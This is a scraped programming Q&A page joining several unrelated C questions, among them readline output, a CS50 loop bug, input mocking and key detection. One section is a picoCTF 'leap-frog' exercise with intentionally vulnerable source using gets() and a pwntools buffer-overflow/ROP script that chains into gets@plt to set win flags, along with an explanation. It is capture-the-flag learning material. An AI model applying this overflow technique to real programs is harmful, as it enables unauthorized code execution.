I'm new to the Gnu Readline library.
I need to call the readline() function when the cursor is at the very last line of the console. But I need to prevent scrolling down when the Return key is pressed; so I'm looking for a way to prevent the output of the carriage return : I'm sure it's possible, but can't find the way to do it.
I tried to use my own rl_getc_function() to trap the Return key (the example below traps y and z keys, but it's just for test purposes) and treat this key in a special way:
My first idea was to run the accept-line command directly, thinking it would not output a carriage return, but actually, it does
My second idea was to redirect the output to /dev/null before calling the accept-line command; but the redirection doesn't seem to apply when the readline() function is already running.
Here is an example of my tests:
#include <stdio.h>
#include <stdlib.h>
#include <readline/readline.h>
FILE *devnull; // To test output redirecting
int my_getc(FILE *file)
{
int c = getc(file);
// Let's test something when the 'y' key is pressed:
if (c == 'y') {
// I was thinking that calling "accept-line" directly
// would prevent the output of a carriage return:
rl_command_func_t *accept_func = rl_named_function("accept-line");
accept_func(1, 0);
return 0;
}
// Another test, when 'z' key is pressed:
if (c == 'z') {
// Try a redirection:
rl_outstream = devnull;
// As the redirection didn't work unless I set it before
// the readline() call, I tried to add this call,
// but it doesn't initialize the output stream:
rl_initialize();
return 'z';
}
return c;
}
int main()
{
devnull = fopen("/dev/null", "w");
// Using my function to handle key input:
rl_getc_function = my_getc;
// Redirection works if I uncomment the following line:
// rl_outstream = devnull;
readline("> "); // No freeing for this simplified example
printf("How is it possible to remove the carriage return before this line?\n");
return 0;
}
I'm sure I missed the right way to do it; any help would be appreciated.
I found it : the rl_done variable is made for this.
If I add this code to my my_getc() function, it works well:
if (c == '\r') {
rl_done = 1;
return 0;
}
No carriage return is then inserted, and my next printf() call displays just after the last char I typed.
Related
I'm pretty new to coding and especially to C, so I decided to take the CS50 course as an introduction to the language. I just finished watching the first lecture on C and, as a means to test my knowledge on the subject, I attempted to write a short little program. Also I am using the course's library for the get_int() function.
The goal is to test the user's input and check if it's less or equal to ten. If it matches the parameters, the program should print the "Success!" message and exit; otherwise, it should ask for input again. If the input value is over 10, the program responds just as expected, but if you input a value of 10 or less, it ends up asking you for input one more time before actually exiting. I think it's probably something with the "for" loop, but I just can't figure it out.
My code:
#include <stdio.h>
#include <cs50.h>
#include <stdlib.h>
int check_for_value();
int main()
{
for(check_for_value(); check_for_value() != 1; check_for_value())
{
printf("Failed!\n");
}
exit(0);
}
int check_for_value()
{
int i = get_int("Your value: \n");
if(i <= 10)
{
printf("Success!\n");
return 1;
}
else
{
printf("Try again!\n");
return 0;
}
}
That isn't doing exactly what you think it is. In your for loop, each time you write check_for_value(), it is going to call that function. So it will call it the first time and the return value will not matter. It will call it again for the middle statement and then the value will matter because you are comparing the output to not equal to 1. And then again it will call the function in the third statement, where again it won't matter. Usually for something like this, you would use a while loop instead. An example below:
int ret = check_for_value();
while(ret != 1) {
printf("Failed\n");
ret = check_for_value();
}
printf("Success\n");
Technically a for loop can work too as the following:
for(int ret = check_for_value(); ret != 1; ret = check_for_value()) {
printf("Failed\n");
}
The for loop can look very simply
for ( ; !check_for_value(); )
{
printf("Failed!\n");
}
In such a case it is better to use the while loop
while ( !check_for_value() )
{
printf("Failed!\n");
}
As for your for loop
for(check_for_value(); check_for_value() != 1; check_for_value())
^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^
then the underlined calls of the function are not tested.
Also bear in mind that such a definition of a for loop
for(int ret = check_for_value(); ret != 1; ret = check_for_value()) {
printf("Failed\n");
}
is a very bad style of programming. There is redundant records of the function calls. The intermediate variable ret is not used in the body of the loop. So its declaration is also redundant. Never use such a style of programming.
Pay attention to that according to the C Standard the function main without parameters shall be declared like
int main( void )
and the statement
exit( 0 );
is redundant.
I am new to binary exploitation problems. This one comes from picoctf 2019, leap-frog. The particular solution I'm interested in uses a buffer overflow on the vuln() function to force execution to return to gets' PLT entry. This is done because gets allows us to write to an arbitrary place in memory (see link). We are interested in writing to win1, win2, and win3. If we can set each of these to true, then we can print the flag! So, all we need to exploit the program is the buffer + address_gets_plt + address_flag + address_win1 + values_for_win_vartiables.
Source
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdbool.h>
#define FLAG_SIZE 64
bool win1 = false;
bool win2 = false;
bool win3 = false;
void leapA() {
win1 = true;
}
void leap2(unsigned int arg_check) {
if (win3 && arg_check == 0xDEADBEEF) {
win2 = true;
}
else if (win3) {
printf("Wrong Argument. Try Again.\n");
}
else {
printf("Nope. Try a little bit harder.\n");
}
}
void leap3() {
if (win1 && !win1) {
win3 = true;
}
else {
printf("Nope. Try a little bit harder.\n");
}
}
void display_flag() {
char flag[FLAG_SIZE];
FILE *file;
file = fopen("flag.txt", "r");
if (file == NULL) {
printf("'flag.txt' missing in the current directory!\n");
exit(0);
}
fgets(flag, sizeof(flag), file);
if (win1 && win2 && win3) {
printf("%s", flag);
return;
}
else if (win1 || win3) {
printf("Nice Try! You're Getting There!\n");
}
else {
printf("You won't get the flag that easy..\n");
}
}
void vuln() {
char buf[16];
printf("Enter your input> ");
return gets(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
vuln();
}
The following script prints the flag when run in the CTF's shell
Solution Script
from pwn import *
payload = ('A'*28) + p32(0x08048430) + p32(0x80486b3) + p32(0x0804a03d)
# = + address_gets_plt + address_flag + address_win1
try:
p = process('./rop')
p.recvuntil('> ')
p.sendline(payload)
p.sendline('\x01\x01\x01\x00') # sets win1, win2, win3 to true via gets reading from stdin
print('Flag: ' + p.recvuntil('}'))
break
except:
p.close()
The following script does NOT work, yet the only difference between the programs is this one merges the sendline() calls. I am guessing this is because the program did not reach the call to gets yet, so it is not ready for input from stdin.
Failed Solution 1
from pwn import *
payload = ('A'*28) + p32(0x08048430) + p32(0x80486b3) + p32(0x0804a03d)
# = + address_gets_plt + address_flag + address_win1
try:
p = process('./rop')
p.recvuntil('> ')
p.sendline(payload+'\x01\x01\x01\x00')
print('Flag: ' + p.recvuntil('}'))
break
except:
p.close()
Failed Solution 2
Then, I tried to run the program without appending '\x01\x01\x01\x00\' to the payload, hoping execution would hit gets and wait for stdin input; however, I instead get a segfault. What is wrong with my logic for these two failed solutions? Thanks!
You need two different payloads, because there a two different calls to gets(). sendline() appends a newline to your input/payload [1], and gets() reads input until a newline is read [2]. So, one sendline() feeds only one gets().
Why are there two calls to gets()? Well, the first call to gets() happens in the vuln() function, and has the purpose of altering the execution flow. If you run the program, gets() asks for user input and stores it in buf[16] on the stack. And because gets() doesn't check for buffer overruns [2], you can actually corrupt the stack by inserting an input that is bigger than 16 bytes. So the first sendline() feeds the payload ('A'*28) + p32(0x08048430) + p32(0x80486b3) + p32(0x0804a03d) to the first call. This corrupts the stack and alters the execution flow. The first address 0x08048430 in the payload (address of gets#plt) manipulates the return address of the first gets(). So when the first gets() finishes execution, it jumps to second gets(). This is the second call to gets(). The second address 0x80486b3 (address of display_flag()) is the return address of the second gets(). So when the second call leaves, it jumps to display_flag(). The third address 0x0804a03d (address of the win1 variable) is the buffer for the second gets(). So the second gets() expects another input/payload from the user and writes it to the address of win1. The second input is served by the second sendline().
Your first solution fails, because you feed only the first gets() call, so the second gets() call has no input at all. Your second solution fails for the same reason.
I have written a console application that waits for the user char input.
application has function:
typedef char *ProcessedDataType;
extern ProcessedDataType askUserInput(void){
int i = getchar();
ProcessedDataType local_var = userInputProcessed(i);
return ProcessedDataType;
}
static ProcessedDataType userInputProcessed(int i){
...
return PocessedDataType;
}
Now, I would like to test this function for several inputs. So where normally the cursor would be blinking for user input, now, automatically, entries from a file that contains the choice letters returns. This would then be asserted against the known result.
runTest{
// when console gets input 'A'
ProcessedDataType local_var = askUserInput();
assert('ProcessedA' == local_var); }
// when console gets input 'B'
ProcessedDataType local_var = askUserInput();
assert('ProcessedB' == local_var); }
// when console gets input 'C'
ProcessedDataType local_var = askUserInput();
assert('ProcessedC' == local_var); }
How do I provide the same string parameters to this function when testing? How do I 'feed' the console the inputs A, B, C, etc ...
I do not want to use Preprocessors as here: How to unit test c functions involving IO?
Other than the obvious that "getchar" is only going to collect one character.... I've therefore replaced this method with a method "getchars", but you can eventually replace with what you actually need.
You're going to need to mock the method that would collect user input, in your test.
#define getchars mockgetchars
const char* expected;
char mockgetchars() {
return expected;
}
expected = "AAAAAAA\n";
ProcessedDataType local_var = askUserInput();
assert("AAAAAAA", local_var);
I have written a function that is supposed to read the number of sentences in a .txt file, but when the function is called and done, it gives me a value of 0.
This program over all has 3 more functions to figure out different properties of the file and I have them working great. This one is laid out the same way I wrote my other functions just looking for some advice on why I am getting 0 as my number of sentences.
void ptrCntS (FILE* sp1, int sCount)
{
char sentence = 'O';
int myChr;
if (!(sp1 = fopen("Hello.txt", "r")))
{
printf("error opening Hello.txt");
return(1);
}
while ((myChr = fgetc(sp1)) != EOF)
{
if ('.')
{
sentence ='O';
}
else if (sentence == 'O')
{
sCount++;
sentence = 'I';
}
}
fclose(sp1);
printf ("Total number of sentences are:\t%d", sCount);
return;
}
instead of return use return(sCount);
and assign the return value to some int variable in calling function
like
int sentCount;
.
.
.
sentCount=ptrCntS (param1,param2);
if ('.') is always true, thus else... code never reached. Use if( myChr == '.' ) instead.
Function compiles now and runs properly. This function is being called from a switch in a previous function where I had my addresses set and included my print statement for the totals so that I would not have to write another function in the end to call on all my counts and print their results. Instead I set my case 'A': to call all of my counting functions(in this case that is what the original code is) and than display my results. I am sorry for any lengthiness or my hard to understand writing I am new to the C language and I am having a hard time grasping the literature but making some process on understanding the syntax.
I am having issues with repeating key checking using a function that utilizes getch().
Here is a code example:
static char g_keybuffer[256];
_Bool IsKeyDown(char c)
{
char ch;
if(kbhit())
ch = getch();
if(ch == -32 || ch == 224)
{
ch = getch();
}
g_keybuffer[ch] = 1;
if(g_keybuffer[c] == 1)
{
g_keybuffer[c] = 0;
return 1;
}
return 0;
}
/*
*
*/
int main(int argc, char** argv) {
while(1)
{
if(IsKeyDown('a'))
{
printf("Test\n");
}
if(IsKeyDown('a'))
{
printf("Hello\n");
}
else if(IsKeyDown('b'))
{
printf("World\n");
}
Sleep(100);
}
return (EXIT_SUCCESS);
}
I know why the problem occurs. When a key is pressed, kbhit is true once per loop, and sets ch to the character retrieved from the buffer. When IsKeyDown is used, if it is equal to the parameter, the key in the buffer g_keybuffer is set equal to zero to avoid having a key be "down" infinitely. The problem with this is if you want to check if the same key is down more than once, only the first instance of IsKeyDown will be ran, with the rest being invalid due to the g_keybuffer of the key now being 0.
Does anyone know how I can change IsKeyDown to give it the ability to check the same key multiple times per looping? I'm stuck.
Your problem is because you are setting g_keybuffer[c] to 0 after you get a hit for the key state. I'm guessing you have done this to avoid getting the same result twice - but that is just a workaround. The only way to do what you want to do properly is to choose a library that is actually made to capture the keyboard state.
Most graphics libraries have functions for capturing keyboard states. I don't know of any solutions thought that don't involve a little overhead if you are just writing a small program.